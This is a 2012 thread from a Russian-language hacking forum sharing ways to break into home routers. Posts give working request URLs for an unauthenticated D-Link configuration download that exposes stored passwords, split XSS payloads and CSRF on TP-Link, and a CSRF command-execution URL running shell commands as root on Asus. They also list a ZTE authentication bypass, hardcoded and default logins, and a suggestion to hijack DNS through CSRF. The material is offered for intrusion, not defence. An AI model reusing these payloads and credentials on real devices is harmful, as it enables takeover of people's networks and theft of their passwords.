Вернуться   RDot > Аспекты НСД > Web-среда/Web-applications

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 06.08.2012, 16:56   #11
Isis
 
Регистрация: 11.07.2010
Сообщений: 2
Репутация: 3
По умолчанию

D-Link Dir-615.
Работает на конфигурации: Hardware Version: C2 Firmware Version: 3.02/3.03
Без авторизации можно скачать файл конфигурации где в открытом виде пароли от админки, интернета и всего, всего.

Делаем обычный GET запрос на адрес
PHP код:
http://IP/save_configuration.cgi 
Получаем большой файл конфигурации.
В зависимости от настроек модема пароль от интернета PPPOE

PHP код:
wan_pppoe_username_00=
wan_pppoe_password_00
Пароль на WI-FI

PHP код:
wlan0_psk_pass_phrase=123123123 
Isis вне форума   Ответить с цитированием
Старый 16.08.2012, 22:56   #12
CryNet
 
Регистрация: 20.07.2012
Сообщений: 6
Репутация: 1
По умолчанию

Зря тему забросили.
примеры настроек большинства роутеров под многие проги: http://portforward.com/routers.htm

http://5421212.blogspot.com/2008/07/blog-post.html?m=1 <- хоть и тема проброс портов, но есть интересные ссылки

Последний раз редактировалось CryNet; 17.08.2012 в 10:43..
CryNet вне форума   Ответить с цитированием
Старый 17.08.2012, 01:36   #13
get
 
Регистрация: 10.08.2012
Сообщений: 4
Репутация: 1
По умолчанию

В модемах Интеркросс, в заводской прошивке, есть бекдор в виде неизменяемого логпасса adsl/realtek
(Работает на чипсетах 8671P/8671B/8672)

Последний раз редактировалось get; 17.08.2012 в 01:41..
get вне форума   Ответить с цитированием
Старый 17.08.2012, 20:22   #14
CryNet
 
Регистрация: 20.07.2012
Сообщений: 6
Репутация: 1
По умолчанию

http://Обсуждение модемов ZXV10 H108L
Цитата:
К уязвимостям не относиться, но просто классный обзор модема ZXV10 H108L (ZTE)

Последний раз редактировалось CryNet; 24.08.2012 в 19:52..
CryNet вне форума   Ответить с цитированием
Старый 26.09.2012, 18:51   #15
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Различные модели D-Link/TP-Link Wireless
CSRF + активка (Wireless -> MAC Filtering)


http://192.168.1.1/userRpm/WlanMacFilterRpm.htm?Desc=</script><script>alert(/*&Mac=00-00-00-00-00-01&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1 &Save=Save
http://192.168.1.1/userRpm/WlanMacFilterRpm.htm?Desc=*/'xss'/*&Mac=00-00-00-00-00-02&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1 &Save=Save
http://192.168.1.1/userRpm/WlanMacFilterRpm.htm?Desc=*/)</script><!--&Mac=00-00-00-00-00-03&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1 &Save=Save

Кавычка экранируется. Длина ограничена, поэтому внедряемый код разбивается на части, при выводе лишний код нейтрализуется многострочным комментарием. Результат на странице http://192.168.1.1/userRpm/WlanMacFilterRpm.htm выглядит примерно так:
Цитата:
<SCRIPT language="javascript" type="text/javascript">
var wlanFilterPara = new Array(
0, 0, 0, 1, 0, 3, 5, 8,
0,0 );
</SCRIPT>
<SCRIPT language="javascript" type="text/javascript">
var wlanFilterList = new Array(
"00-00-00-00-00-01", 1, 1, "", "</script><script>alert(/*",
"00-00-00-00-00-02", 1, 1, "", "*/'xss'/*",
"00-00-00-00-00-03", 1, 1, "", "*/)</script><!--",
0,0 );
</SCRIPT>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-MR3220</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_main.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" src="/dynaform/common.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.1.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
//--></SCRIPT>

p.s.: Может паблик, не проверял. Увидел тему, зашел в панель управления своего роутера, что первое попалось на глаза, то и написал.



UPD:
Чуть не забыл про Basic Auth. Используем дефолтную учетку admin:admin. Вместо http://192.168.1.1/ пишем http://admin:admin@192.168.1.1/

Последний раз редактировалось M_script; 26.09.2012 в 20:33..
M_script вне форума   Ответить с цитированием
Старый 03.10.2012, 15:25   #16
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

Asus WL500gpv2, что стоковая, что прошивка от Олега. Вся вебморда в csrf.
Дефолт: http://admin:admin@192.168.1.1.
Данная модель работает на базе линя, так что самым полезным будет данный вектор (на прошивке от Олега):
Код:
http://admin:admin@192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp&next_page=Main_AdmStatus_Content.asp&next_host=192.168.1.1&sid_list=FirewallConfig%3B&group_id=&modified=0&action_mode=+Refresh+&first_time=&action_script=&SystemCmd=ls&action=Refresh
по дефолту нет ни перла, ни нетката. Но есть встроенный dropbear, iptables и wget. Команды выполняются от admin (uid=0)
__________________
Sad panda
nobody вне форума   Ответить с цитированием
Старый 05.10.2012, 13:10   #18
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от FIXER Посмотреть сообщение
[offtop]http://www.xakep.ru/post/59422/[/offtop]
грамотно они воспользовались )
Они получили бы гораздо больше роутеров, если бы не сканировали диапазоны, а меняли DNS из локальной сети через CSRF.
M_script вне форума   Ответить с цитированием
Старый 04.11.2012, 16:05   #19
S00pY
 
Аватар для S00pY
 
Регистрация: 05.07.2010
Сообщений: 39
Репутация: 35
По умолчанию lolwut

Цитата:
Сообщение от CryNet Посмотреть сообщение
ZTE ZXV10 H108L

Редкое дерьмо : )
Укртелеком в свое время раздавал бесплатно(мб и сейчас раздает)
Дефолт
Цитата:
192.168.1.1
Веб
login:admin
pass:admin

telnet
login:root
pass:root
BusyBox v1.01
Authentication Bypass
Напрямую обращаемся к нужному скрипту
Цитата:
К примеру правим настройки удаленного доступа к роутеру(подменю Service Control)
http://ip/getpage.gch?pid=1002&nextpage=sec_sc_t.gch
CSRF
Цитата:
Вся вебморда
Если роутер недоступен из вне
auth bypass + csrf = профит!
ЗЫ: Пароль к telnet штатными средствами сменить нельзя походу : (

Последний раз редактировалось S00pY; 04.11.2012 в 16:23..
S00pY вне форума   Ответить с цитированием
Старый 20.12.2012, 19:54   #20
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

бруты и сканеры:
Брут роутеров D-Link
Fast HTTP Vulnerability Scanner
Black Vlastelin Scanner
DrakonHaSh вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot